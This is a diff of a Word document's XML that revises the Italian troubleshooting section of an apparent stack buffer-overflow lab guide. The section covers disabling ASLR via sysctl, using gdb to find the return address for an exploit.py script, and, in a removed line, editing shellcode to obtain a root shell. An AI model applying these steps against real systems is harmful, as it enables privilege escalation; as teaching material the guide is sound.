-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">g) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Risoluzione</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>problemi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Standard"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -9031,21 +9296,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Se il programma funziona correttamente </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ma l</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a shell di </w:t>
+        <w:t xml:space="preserve">Se </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>il programma creato funziona solamente i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>n modalità ‘</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9053,7 +9318,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>comand</w:t>
+        <w:t>gdb</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -9061,27 +9326,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">che si apre al termine dell’esecuzione </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>non è ROOT:</w:t>
+        <w:t xml:space="preserve">’ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>e non nella shell normale:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
@@ -9119,42 +9378,132 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>change "\x68""//</w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">sudo </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>sh</w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>sysctl</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>" to "\x68""/</w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -w </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>zsh</w:t>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>kernel.randomize</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>_va_space</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>=0</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>unset env LINES</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>unset env COLUMNS</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -9187,21 +9536,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Se </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>il programma creato funziona solamente i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>n modalità ‘</w:t>
+        <w:t>Se la console ritorna “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9209,7 +9544,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>gdb</w:t>
+        <w:t>Illegal</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -9217,21 +9552,120 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">’ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>e non nella shell normale:</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>instruction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>” oppure “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Segmentation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Fault”:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Controllare se il Return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dello </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> è cambiato, quindi controllare se “addr1” è uguale a quello nel file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit. Se è diverso, aggiornarlo e rieseguire il file exploit.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
@@ -9269,57 +9703,30 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">sudo </w:t>
-            </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t>sysctl</w:t>
+              </w:rPr>
+              <w:t>gdb</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -w </w:t>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t>kernel.randomize</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t>_va_space</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>stack_dbg</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t>=0</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -9327,7 +9734,6 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -9339,12 +9745,99 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>) b foo</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>) run</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>p $</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>ebp</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
           </w:p>
@@ -9354,406 +9847,22 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>unset env LINES</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>unset env COLUMNS</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve">---&gt; addr1: </w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
